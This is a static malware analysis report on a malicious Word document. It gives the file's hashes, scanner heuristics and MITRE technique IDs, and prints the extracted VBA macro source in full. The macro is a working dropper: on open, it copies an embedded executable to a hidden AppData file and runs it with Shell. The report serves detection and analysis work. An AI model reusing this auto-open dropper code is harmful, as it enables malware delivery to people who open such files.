Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 d04079c569863276…

MALICIOUS

Office (OOXML)

113.7 KB Created: 2014-11-24 00:16:00 UTC Authoring application: Microsoft Office Word 15.0000 First seen: 2015-02-05
MD5: 5d8928dc78c56a0409076ed13d22b451 SHA-1: b5bf3ddcf2cec0e245fc46543ff466e3a5928e5a SHA-256: d04079c569863276bf4a135096b68fbafc6bb2679ac10b41b4af40f30d6fbb12
314 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1140 Deobfuscate or Obfuscate Malicious Code

The sample contains VBA macros with Auto_Open and Workbook_Open functions, indicating an attempt to execute code upon opening. The script attempts to copy a file named 'updater.exe' from a temporary location to 'C:\Users\<username>\AppData\ntuserssc.exe', marks it as hidden, and then executes it. This behavior is consistent with a downloader or dropper malware.

Heuristics 10

  • ClamAV: Doc.Downloader.Generic-6698421-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Generic-6698421-0
  • Ole10Native package drops an auto-executable payload critical OFFICE_PACKAGE_RISKY_FILE
    OLE Package displayName or fullPath ends in a directly auto-executable extension (a runnable binary or a script the default shell host runs on double-click). Embedding such a payload inside an Office document has no benign authoring use — it is a malware-delivery dropper.
  • VBA project inside OOXML medium 5 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
    Shell HGO
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub AutoOpen()
  • Workbook_Open macro low OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script
    Sub Workbook_Open()
  • Auto_Open macro low OLE_VBA_AUTO
    Auto_Open macro
    Matched line in script
    Sub Auto_Open()
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
    TMP = "C:\Users\" & Environ("username") & "\AppData\Local\Temp\"
  • Embedded OLE object medium OOXML_OLE_OBJECT
    Document contains an embedded OLE object
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)

Extracted artifacts 6

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 3348 bytes
SHA-256: ff38bc7e213d0a003b9b243ccf1f293a1d45eab5f4b8aaf7ff16aed90f4f14a7
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub Auto_Open()
    h
End Sub
Sub h()
On Error Resume Next
Dim HH, HGO, SS, RS, TMP, EX As String
SS = 168448
EX = "updater.exe"
TMP = "C:\Users\" & Environ("username") & "\AppData\Local\Temp\"
HH = TMP + EX
If (Len(Dir(HH)) <> 0) Then
      Kill HH
End If
HGO = "C:\Users\" & Environ("username") & "\AppData\ntuserssc.exe"
If (Len(Dir(HGO)) <> 0) Then
      Kill HGO
End If
Dim fso As Object
Set fso = Me.Application.ActiveDocument.InlineShapes(1).OLEFormat.Object
WaitFor (2)
RS = FileLen(TMP + EX)
If (RS = SS) Then
FileCopy HH, HGO
SetAttr HGO, vbHidden
Shell HGO
End If
Kill HH
End Sub
Sub AutoOpen()
    Auto_Open
End Sub
Sub Workbook_Open()
    Auto_Open
End Sub
Sub WaitFor(NumOfSeconds As Long)
Dim SngSec As Long
SngSec = Timer + NumOfSeconds
Do While Timer < SngSec
DoEvents
Loop
End Sub


Sub deltags()
For Each myStoryRange In ActiveDocument.StoryRanges
    With myStoryRange.Find
        .Text = "<" & "sel" & "ect>"
        .Replacement.Text = " "
        .Wrap = wdFindContinue
        .Execute Replace:=wdReplaceAll
    End With
Next myStoryRange

For Each myStoryRange In ActiveDocument.StoryRanges
    With myStoryRange.Find
        .Text = "</s" & "ele" & "ct>"
        .Replacement.Text = " "
        .Wrap = wdFindContinue
        .Execute Replace:=wdReplaceAll
    End With
Next myStoryRange
    
For Each myStoryRange In ActiveDocument.StoryRanges
    With myStoryRange.Find
        .Text = "<" & "in" & "box>"
        .Replacement.Text = " "
        .Wrap = wdFindContinue
        .Execute Replace:=wdReplaceAll
    End With
Next myStoryRange

For Each myStoryRange In ActiveDocument.StoryRanges
    With myStoryRange.Find
        .Text = "</" & "in" & "box>"
        .Replacement.Text = " "
        .Wrap = wdFindContinue
        .Execute Replace:=wdReplaceAll
    End With
Next myStoryRange
End Sub

Sub deltext()
Dim firstTerm, secondTerm, selectedText As String
Dim myRange, selRange As Range
Set myRange = ActiveDocument.Range
firstTerm = "<se" & "lect>"
secondTerm = "</sel" & "ect>"
With myRange.Find
.Text = firstTerm
.MatchWholeWord = True
.Execute
myRange.Collapse direction:=wdCollapseEnd
Set selRange = ActiveDocument.Range
selRange.Start = myRange.End
.Text = secondTerm
.MatchWholeWord = True
.Execute
myRange.Collapse direction:=wdCollapseStart
selRange.End = myRange.Start
selectedText = selRange.Delete
End With
End Sub
Sub addtext()
Dim firstTerm, secondTerm, selectedTextt As String
Dim myRanget, selRanget As Range
Set myRanget = ActiveDocument.Range
firstTerm = "<in" & "box>"
secondTerm = "</in" & "box>"
With myRanget.Find
.Text = firstTerm
.MatchWholeWord = True
.Execute
myRanget.Collapse direction:=wdCollapseEnd
Set selRanget = ActiveDocument.Range
selRanget.Start = myRanget.End
.Text = secondTerm
.MatchWholeWord = True
.Execute
myRanget.Collapse direction:=wdCollapseStart
selRanget.End = myRanget.Start
selectedTextt = selRanget
selRanget.Font.Color = wdColorBlack
End With
End Sub
ooxml_oleobject_00.bin ooxml-ole-object OOXML embedded OLE part: word/embeddings/oleObject1.bin 172544 bytes
SHA-256: 7532f2b1719eec8a23ef15f80667c433f7fada73f56617453c7e9ad8cd825dad
ooxml_oleobject_00_ole10native_00.bin ole-package OOXML word/embeddings/oleObject1.bin Ole10Native stream: Ole10Native 168730 bytes
SHA-256: b52ea65a57229e61b357f07a9bbf3b87c96d2aadd0a6f998d8b959855d32676e
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 14336 bytes
SHA-256: 496e1837f2b52f9048e7541a0333245aab00093c2ee8a00057ebded794f6b8de
Detection
ClamAV: Doc.Downloader.Generic-6698421-0
Obfuscation or payload: unlikely
emf_00.emf ooxml-emf OOXML EMF part: docProps/thumbnail.emf 11812 bytes
SHA-256: 0504d15c13ea3f825003b3459c8a28a8cdde103f3e83a1b2d426535800e9d0d5
emf_01.emf ooxml-emf OOXML EMF part: word/media/image1.emf 5440 bytes
SHA-256: c620974e8f7c527db57bf5e3a1a51da70dba46b5ed1e96fd707e5a214740f7c4

Open this report in the interactive analyzer, or submit your own file for analysis.